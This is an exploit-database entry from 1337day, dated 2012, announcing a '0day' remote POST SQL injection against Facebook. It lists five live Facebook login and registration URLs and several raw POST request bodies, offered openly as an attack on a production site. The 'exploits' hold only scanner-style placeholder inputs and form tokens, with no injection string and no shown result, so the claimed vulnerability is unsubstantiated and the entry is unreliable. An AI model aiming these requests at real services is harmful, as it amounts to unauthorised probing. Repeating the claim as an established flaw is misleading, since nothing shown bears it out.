Facebook - Remote Post SQL Injection Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
| C _:_ A |        Facebook - Remote Post SQL Injection        | C _:_ A |
--------------------------------------------------------------------------

==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org 
--- omar-taurus[at]live[dot]com
 
===> INFO:
Author        : TAURUS OMAR
Category      : Webapps / 0day 
Title Exploit : Facebook - Remote Post SQL Injection 
Vendor        : Facebook
URL Vendor    : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase 

==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php^jsonp=1  [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728  [ Remote Post SQL Injection ]

==> EXPLOIT'S
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charset_test=&euro;,&acute;,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n&locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&next=http://www.facebook.com/advertising/?campaign_id=402047449186&amp;placement=pflo&amp;extra_1=not-admgr-user
+trynum=1&charset_test=&euro;,&acute;,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0
+display=&session_key_only=0&trynum=1&charset_test=&euro;,&acute;,€,´,?,?,?&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1
+login_str=wcrtestinput000000&password=wcrtestinput000001&lsd=avo_l9kt&importer_action=2&flow=2&type=1&callback_element_id=&tracked_params=[]
+charset_test=&euro;,&acute;,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=&euro;,&acute;,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&mid=&fid=&reg_dropoff_id=&reg_dropoff_code=&ro_invite_signup_id=737818179100220658&terms=on&abtest_registration_group=1&referrer=&md5pass=&validate_mx_records=1&asked_to_login=0&ab_test_data=&firstname=wcrtestinput000000&lastname=wcrtestinput000001&reg_email__=wcrtestinput000002&reg_email_confirmation__=wcrtestinput000003&reg_passwd__=wcrtestinput000004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euuhuq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4brsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmppd9boq5hew&extra_challenge_params=authp=nonce.tt.time.new_audio_default&amp;psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&amp;nonce=cmqamvx4apmppd9boq5hew&amp;tt=ducvyhgabbkslmk3pkqnmd16nqi&amp;time=1339980632&amp;new_audio_default=1&recaptcha_type=password&captcha_response=wcrtestinput000005&sex=0&birthday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bundle=&app_data=&reg_data=&app_id=&fbpage_id=20531316728&reg_oid=20531316728


# 1337day.com [2012-06-18]